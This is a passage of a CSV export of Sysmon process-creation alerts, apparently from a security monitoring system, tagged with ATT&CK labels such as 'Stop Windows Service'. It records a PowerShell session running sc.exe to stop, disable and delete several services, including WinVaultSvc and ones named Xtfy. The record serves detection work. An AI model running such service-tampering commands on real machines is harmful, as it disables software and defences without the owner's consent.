Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.688090500Z"",""eventRecordID"":""3208"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.683\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bb492b00}\r\nProcessId: 8172\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.683"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010bb492b00}"",""processId"":""8172"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.076",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.666 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd482b00} +ProcessId: 7356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.668724000Z"",""eventRecordID"":""3207"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.666\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd482b00}\r\nProcessId: 7356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.666"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010dd482b00}"",""processId"":""7356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.039",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.552 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010f0452b00} +ProcessId: 7964 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.557402100Z"",""eventRecordID"":""3204"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.552\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010f0452b00}\r\nProcessId: 7964\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.552"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010f0452b00}"",""processId"":""7964"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:57.840",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.408 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010ab422b00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.416042400Z"",""eventRecordID"":""3201"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.408\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010ab422b00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.408"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010ab422b00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:57.822",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.378 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e0412b00} +ProcessId: 1852 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfy Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfy Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.390164200Z"",""eventRecordID"":""3200"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.378\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e0412b00}\r\nProcessId: 1852\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfy Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.378"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010e0412b00}"",""processId"":""1852"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfy Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:57.700",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.324 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-00102f402b00} +ProcessId: 7500 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.330289500Z"",""eventRecordID"":""3198"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.324\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-00102f402b00}\r\nProcessId: 7500\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.324"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-00102f402b00}"",""processId"":""7500"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:57.016",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.185 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e03c2b00} +ProcessId: 3936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 